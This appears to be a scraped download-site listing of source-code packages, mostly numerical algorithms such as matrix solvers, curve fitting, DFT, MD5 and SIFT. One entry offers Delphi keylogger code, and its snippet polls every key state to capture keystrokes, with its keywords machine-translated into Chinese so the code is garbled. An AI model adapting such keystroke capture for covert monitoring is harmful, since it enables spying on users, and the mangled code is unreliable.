-
simulated_annealing header file that implements the simulated annealing optimisa...
simulated_annealing header file that implements the simulated annealing optimisation algorithms
- 2022-06-22 00:54:21下载
- 积分:1
-
Fortran求解矩阵线性方程组,有例子,可以直接运行
Fortran求解矩阵线性方程组,有例子,可以直接运行
/"P.S:本软件既可以计算线性方程组Ax=b,也可以计算矩阵方程AX=B")
Purpose : 消去法解矩阵方程
!
!-----------------------------------------------------
! In put data files :
! 1. fin.txt 输入方程系数
! 2.
! Output data files :
- 2023-03-15 08:45:04下载
- 积分:1
-
常用的矩阵变换C代码
常用的矩阵变换C代码,复矩阵乘法、矩阵的转置、全选主元高斯-约当法、对称正定矩阵的求逆、
求行列式值的全选主元高斯消去法、矩阵的三角分解、一般实矩阵的QR分解,奇异值分解
- 2023-01-12 08:45:04下载
- 积分:1
-
最小二乘法拟合曲线,在TC2.0中编译通过
最小二乘法拟合曲线,在TC2.0中编译通过-least squares fitting, in which compile WITH TC 2.0
- 2022-03-25 08:02:18下载
- 积分:1
-
normal dft
标准dft,是标准的dft,虽然没有特别的地方,但对于了解其内涵或许有一定的帮助-normal dft
- 2023-01-25 06:50:04下载
- 积分:1
-
通过 Delphi Keyloger 代码
程序 Send(x: string);
开始
form1。Memo1.Lines.Add(x)
结束 ;
程序 TForm1.Timer1Timer(Sender: TObject);
//begin
//if GetAsyncKeyState(Ord("A")) =-32767 然后 send("A") ;
//if GetAsyncKeyState(Ord("B")) =-32767 然后 send("B") ;
var X,y:integer ;
f:char ;
str:string ;
开始
X: = 0 到 255 做
开始
- 2022-06-29 21:37:30下载
- 积分:1
-
MD5算法的源代码
MD5算法的源代码
MD5算法的源代码
MD5算法的源代码-MD5 algorithm MD5 algorithm source code source code
- 2022-03-14 21:14:03下载
- 积分:1
-
矩阵直接三角分解法的c++语言实现
矩阵直接三角分解法的c++语言实现 -direct triangular matrix decomposition of the C Language
- 2022-07-18 15:19:19下载
- 积分:1
-
随机生成的字符串段。
随机产生一段字符串。-randomly generated string section.
- 2023-04-08 01:15:04下载
- 积分:1
-
sift算法 采用opencv,VC++实现
sift算法 采用opencv,VC++实现 值得借鉴
- 2022-09-08 23:25:07下载
- 积分:1